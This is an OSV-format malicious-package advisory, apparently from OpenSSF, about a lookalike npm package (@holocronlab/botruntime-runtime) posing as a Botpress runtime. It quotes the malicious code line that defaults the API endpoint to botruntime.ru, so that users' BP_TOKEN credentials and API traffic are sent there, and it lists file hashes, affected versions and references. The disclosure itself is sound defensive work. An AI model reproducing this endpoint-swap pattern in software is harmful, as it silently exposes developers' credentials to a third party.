MAL-2026-13419Malicious code in @holocronlab/botruntime-runtime (npm)
| Ecosystem | Package | Version |
|---|---|---|
| npm | @holocronlab/botruntime-runtime | 2.1.15 |
| npm | @holocronlab/botruntime-runtime | 2.2.5 |
| npm | @holocronlab/botruntime-runtime | 2.2.7 |
| npm | @holocronlab/botruntime-runtime | 2.4.2 |
| npm | @holocronlab/botruntime-runtime | 2.5.0 |
| npm | @holocronlab/botruntime-runtime | 2.5.4 |
| npm | @holocronlab/botruntime-runtime | 2.6.0 |
| npm | @holocronlab/botruntime-runtime | 2.6.1 |
| npm | @holocronlab/botruntime-runtime | 2.6.3 |
| npm | @holocronlab/botruntime-runtime | 2.6.4 |
| npm | @holocronlab/botruntime-runtime | 2.9.7 |
{"schema_version":"1.7.4","id":"MAL-2026-13419","published":"2026-08-06T14:18:29Z","modified":"2026-08-06T15:21:39.660274932Z","summary":"Malicious code in @holocronlab/botruntime-runtime (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (ad15bd6ba410e0c0ca88ac22f1632a4b6707c4c66396c49c0ba90f906b19ae33)\nThe package is published as a runtime for 'brt-built botruntime agents' and its client.d.ts describes the exported `client` as 'the authenticated Botpress client'. Bundled entrypoints (dist/library.js, dist/definition.js, dist/runtime.js, dist/internal.js) read the standard Botpress SDK environment variables — process.env.BP_TOKEN / ADK_TOKEN / ADK_BOT_ID / ADK_WORKSPACE_ID — and construct `new Client({ token: process.env.BP_TOKEN?? process.env.ADK_TOKEN, apiUrl: process.env.ADK_API_URL?? \"https://botruntime.ru\" })`. The real Botpress SDK defaults to api.botpress.cloud; here the default is swapped to https://botruntime.ru, a domain unrelated to Botpress. Source maps in the shipped bundle reference github.com/botpress/botpress and github.com/botpress/skynet, and the package's entire dependency tree is a family of @holocronlab/botruntime-* shadow packages (sdk, client, chat, cognitive, evals, llmz, zai, zui, thicktoken, const) mirroring real @botpress/* packages. A developer who installs this expecting a Botpress-compatible runtime and populates BP_TOKEN with their real Botpress personal access token has that live third-party credential and all associated API traffic silently directed to botruntime.ru whenever ADK_API_URL is unset.\n","affected":[{"package":{"name":"@holocronlab/botruntime-runtime","ecosystem":"npm"},"versions":["2.2.5","2.9.7","2.2.7","2.6.1","2.5.4","2.4.2","2.5.0","2.1.15","2.6.0","2.6.3","2.6.4"],"database_specific":{"cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}],"indicators":{"evidence_files":[{"path":"dist/library.js","sha256":"4b7c09a7c0d888891d1b7b176665d5e86a4005ba96fdb89764860023ff70c068","tlsh":"12a4b61a29f71022096370a55f6fa001b631a0073a49dd64bf9c43a85fc992dd7fbbed"},{"path":"dist/runtime/client.d.ts","sha256":"2c62ec9aa864e6aaaf003f10017b5895a4607e3edcd5a04ed2711dae6179c010","tlsh":"b7116a61764422b3c2a712639aaea4e10332d6197a8334287dde06bc1e9409bc79bfc5"}],"package_integrity":[{"filename":"botruntime-runtime-2.2.5.tgz","hashes":{"sha1":"47aaba1c373013ea2e73f897ffb792b4626b54ef","sha512_sri":"sha512-XcK5mCKCejJ+RmH0RrHBRrQvFd3vBq6VsiJ8KM77n8kSlAqhiGcW+NVWCMkl89Wou1j4813nB57y4f2rTurt3w=="}}]}}}],"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/@holocronlab/botruntime-runtime/v/2.2.5"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@holocronlab/botruntime-runtime/v/2.9.7"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@holocronlab/botruntime-runtime/v/2.2.7"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@holocronlab/botruntime-runtime/v/2.6.1"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@holocronlab/botruntime-runtime/v/2.5.4"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@holocronlab/botruntime-runtime/v/2.4.2"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@holocronlab/botruntime-runtime/v/2.5.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@holocronlab/botruntime-runtime/v/2.1.15"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@holocronlab/botruntime-runtime/v/2.6.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@holocronlab/botruntime-runtime/v/2.6.3"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@holocronlab/botruntime-runtime/v/2.6.4"}],"database_specific":{"malicious-packages-origins":[{"id":"IN-MAL-2026-016596","import_time":"2026-08-06T14:19:56.649816119Z","modified_time":"2026-08-06T14:19:14Z","sha256":"0e2d9a10ec400f64f0c1a112a8dd1631c3db8765c6598fa2b9a1cff6f8d4ee24","source":"amazon-inspector","versions":["2.2.5"]},{"id":"IN-MAL-2026-016597","import_time":"2026-08-06T14:19:56.680666694Z","modified_time":"2026-08-06T14:19:21Z","sha256":"d408528f7556bc157dc3e04d19850432f1c34d661e1b9d5f7aabdb165d1fa37a","source":"amazon-inspector","versions":["2.9.7"]},{"id":"IN-MAL-2026-016598","import_time":"2026-08-06T14:19:56.706366669Z","modified_time":"2026-08-06T14:19:31Z","sha256":"f66cf12c9c593719a380fcfd6bc3fa356b2fcd3e986c8bdd76faee8387cc9899","source":"amazon-inspector","versions":["2.2.7"]},{"id":"IN-MAL-2026-016590","import_time":"2026-08-06T14:19:56.434867531Z","modified_time":"2026-08-06T14:18:29Z","sha256":"45ecc6b6d65999d0c272e7aec8f2af28ba768bda6b8fb0c5f7472640ef77c18e","source":"amazon-inspector","versions":["2.6.1"]},{"id":"IN-MAL-2026-016595","import_time":"2026-08-06T14:19:56.62566544Z","modified_time":"2026-08-06T14:19:07Z","sha256":"69574d32165fd7bc23a4edeb941f15c50b61fcb13e1e7a87dab3009ce0b7ee57","source":"amazon-inspector","versions":["2.5.4"]},{"id":"IN-MAL-2026-016593","import_time":"2026-08-06T14:19:56.573016209Z","modified_time":"2026-08-06T14:18:52Z","sha256":"76ca575694c8088ffc320b83bc1408a1aa67b7ed4f88287053ef6ab0423dd518","source":"amazon-inspector","versions":["2.4.2"]},{"id":"IN-MAL-2026-016591","import_time":"2026-08-06T14:19:56.498557403Z","modified_time":"2026-08-06T14:18:36Z","sha256":"872531f86f7684cb50b8669943244ec568d9cd758732d57580017e1a9e87d1e0","source":"amazon-inspector","versions":["2.5.0"]},{"id":"IN-MAL-2026-016592","import_time":"2026-08-06T14:19:56.526788756Z","modified_time":"2026-08-06T14:18:44Z","sha256":"8d8d7b3af2c1917fe55a200d67cccf2ca326f3f0a4e194b395d810df6e63dd75","source":"amazon-inspector","versions":["2.1.15"]},{"id":"IN-MAL-2026-016594","import_time":"2026-08-06T14:19:56.60116144Z","modified_time":"2026-08-06T14:19:00Z","sha256":"ad15bd6ba410e0c0ca88ac22f1632a4b6707c4c66396c49c0ba90f906b19ae33","source":"amazon-inspector","versions":["2.6.0"]},{"id":"IN-MAL-2026-016600","import_time":"2026-08-06T15:19:32.220631424Z","modified_time":"2026-08-06T14:19:47Z","sha256":"1d9e858ba81f4f3a2a25d0026958788920c6eb9ec0e0ae1be3b768e7e137a36b","source":"amazon-inspector","versions":["2.6.3"]},{"id":"IN-MAL-2026-016599","import_time":"2026-08-06T15:19:32.184952754Z","modified_time":"2026-08-06T14:19:40Z","sha256":"bada5f0632e5c7432fcc10689a1a6471203761758b22b93b354ad2381ff732af","source":"amazon-inspector","versions":["2.6.4"]}]},"credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}数据来源:OpenSSF Malicious Packages · Apache-2.0